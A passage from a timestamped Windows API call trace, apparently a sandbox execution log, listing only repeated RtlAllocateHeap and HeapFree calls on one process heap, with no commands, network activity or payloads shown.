(HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e296b0 [0204.732] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e3c8c0 [0204.732] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e4fad0 [0204.733] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9e0) returned 0x4ad330 [0204.733] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4acc90 | out: hHeap=0x480000) returned 1 [0204.733] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e62ce0 [0204.733] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e75ef0 [0204.734] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e89100 [0204.735] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e9c310 [0204.735] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2eaf520 [0204.736] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ec2730 [0204.736] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ed5940 [0204.737] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ee8b50 [0204.737] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2efbd60 [0204.738] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f0ef70 [0204.738] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f22180 [0204.739] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f35390 [0204.740] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f485a0 [0204.741] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f5b7b0 [0204.741] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f6e9c0 [0204.742] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f81bd0 [0204.742] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2f94de0 [0204.743] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2fa7ff0 [0204.744] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2fbb200 [0204.744] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2fce410 [0204.745] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2fe1620 [0204.746] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ff4830 [0204.747] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3007a40 [0204.747] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x301ac50 [0204.748] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x302de60 [0204.749] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3041070 [0204.750] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3054280 [0204.751] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3067490 [0204.752] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x307a6a0 [0204.752] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x308d8b0 [0204.753] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x30a0ac0 [0204.753] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x30b3cd0 [0204.754] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x30c6ee0 [0204.754] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x30da0f0 [0204.755] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x30ed300 [0204.755] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3100510 [0204.756] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3113720 [0204.757] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3126930 [0204.757] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3139b40 [0204.758] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x314cd50 [0204.758] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x315ff60 [0204.759] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3173170 [0204.759] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3186380 [0204.760] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3199590 [0204.761] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x31ac7a0 [0204.762] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x31bf9b0 [0204.762] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x31d2bc0 [0204.763] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x31e5dd0 [0204.764] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x31f8fe0 [0204.765] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x320c1f0 [0205.186] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x321f400 [0205.187] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3232610 [0205.187] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3245820 [0205.188] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3258a30 [0205.188] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x326bc40 [0205.188] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x327ee50 [0205.189] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3292060 [0205.189] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x32a5270 [0205.190] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x32b8480 [0205.190] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x32cb690 [0205.191] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x32de8a0 [0205.191] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x32f1ab0 [0205.191] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3304cc0 [0205.191] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3317ed0 [0205.192] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x332b0e0 [0205.192] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x333e2f0 [0205.193] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3351500 [0205.193] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3364710 [0205.193] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3377920 [0205.194] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x338ab30 [0205.194] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x339dd40 [0205.195] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x33b0f50 [0205.195] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x33c4160 [0205.196] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x33d7370 [0205.196] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x33ea580 [0205.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x33fd790 [0205.197] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x34109a0 [0205.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3423bb0 [0205.198] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3436dc0 [0205.199] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3449fd0 [0205.199] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x345d1e0 [0205.199] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x34703f0 [0205.200] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3483600 [0205.200] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3496810 [0205.201] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x34a9a20 [0205.201] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x34bcc30 [0205.201] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x34cfe40 [0205.201] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x34e3050 [0205.202] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x34f6260 [0205.202] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3509470 [0205.203] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x351c680 [0205.203] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x352f890 [0205.204] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3542aa0 [0205.204] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3555cb0 [0205.205] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3568ec0 [0205.205] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x357c0d0 [0205.206] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x358f2e0 [0205.206] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x35a24f0 [0205.207] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x35b5700 [0205.208] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x35c8910 [0205.208] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x35dbb20 [0205.209] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x35eed30 [0205.209] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3601f40 [0205.210] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3615150 [0205.210] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3628360 [0205.211] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xed0) returned 0x4cad30 [0205.211] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ad330 | out: hHeap=0x480000) returned 1 [0205.211] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x363b570 [0205.211] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x364e780 [0205.212] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3661990 [0205.212] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3674ba0 [0205.212] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3687db0 [0205.213] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x369afc0 [0205.213] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x36ae1d0 [0205.213] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x36c13e0 [0205.214] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x36d45f0 [0205.214] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x36e7800 [0205.215] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x36faa10 [0205.215] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x370dc20 [0205.215] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3720e30 [0205.216] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3734040 [0205.216] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3747250 [0205.217] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x375a460 [0205.217] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x376d670 [0205.218] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3780880 [0205.218] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3793a90 [0205.219] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x37a6ca0 [0205.219] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x37b9eb0 [0205.219] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x37cd0c0 [0206.240] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x37e02d0 [0206.241] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x37f34e0 [0206.241] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x38066f0 [0206.241] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3819900 [0206.241] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x382cb10 [0206.242] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x383fd20 [0206.242] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3852f30 [0206.242] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3866140 [0206.243] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3879350 [0206.243] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x388c560 [0206.244] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x389f770 [0206.244] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x38b2980 [0206.244] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x38c5b90 [0206.245] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x38d8da0 [0206.245] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x38ebfb0 [0206.246] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x38ff1c0 [0206.246] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39123d0 [0206.247] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39255e0 [0206.247] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39387f0 [0206.248] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x394ba00 [0206.248] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x395ec10 [0206.248] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3971e20 [0206.249] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3985030 [0206.250] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3998240 [0206.250] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39ab450 [0206.250] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39be660 [0206.251] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39d1870 [0206.251] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39e4a80 [0206.251] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x39f7c90 [0206.252] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a0aea0 [0206.252] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a1e0b0 [0206.253] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a312c0 [0206.253] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a444d0 [0206.254] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a576e0 [0206.254] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a6a8f0 [0206.255] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a7db00 [0206.255] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3a90d10 [0206.256] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3aa3f20 [0206.256] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3ab7130 [0206.256] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3aca340 [0206.257] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3add550 [0206.257] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3af0760 [0206.258] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x3b03970 [0217.410] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b7b20 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4d7920 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4eab30 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4fdd40 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x510f50 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x524160 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x537370 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x54a580 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x55d790 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1e60080 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1e73290 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1e864a0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1e996b0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1eac8c0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ebfad0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ed2ce0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ee5ef0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ef9100 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f0c310 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f1f520 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1f32730 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x1ff0080 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2003290 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20164a0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20296b0 | out: hHeap=0x480000) returned 1 [0217.411] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x203c8c0 | out: hHeap=0x480000) returned 1 [0217.419] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x204fad0 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2062ce0 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2075ef0 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2089100 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x209c310 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20af520 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20c2730 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20d5940 | out: hHeap=0x480000) returned 1 [0217.420] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20e8b50 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x20fbd60 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x210ef70 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2122180 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2135390 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21485a0 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x215b7b0 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x216e9c0 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2181bd0 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2194de0 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21a7ff0 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21bb200 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21ce410 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x21f0080 | out: hHeap=0x480000) returned 1 [0217.423] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2203290 | out: hHeap=0x480000) returned 1 [0217.427] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22164a0 | out: hHeap=0x480000) returned 1 [0217.427] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22296b0 | out: hHeap=0x480000) returned 1 [0217.427] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x223c8c0 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x224fad0 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2262ce0 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2275ef0 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2289100 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x229c310 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22af520 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22c2730 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22d5940 | out: hHeap=0x480000) returned 1 [0217.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22e8b50 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x22fbd60 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x230ef70 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2322180 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2335390 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23485a0 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x235b7b0 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x236e9c0 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2381bd0 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2394de0 | out: hHeap=0x480000) returned 1 [0217.431] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23a7ff0 | out: hHeap=0x480000) returned 1 [0217.434] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23bb200 | out: hHeap=0x480000) returned 1 [0217.435] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23ce410 | out: hHeap=0x480000) returned 1 [0217.435] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23e1620 | out: hHeap=0x480000) returned 1 [0217.435] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x23f4830 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2407a40 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x241ac50 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x242de60 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2441070 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2454280 | out: hHeap=0x480000) returned 1 [0217.438] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2467490 | out: 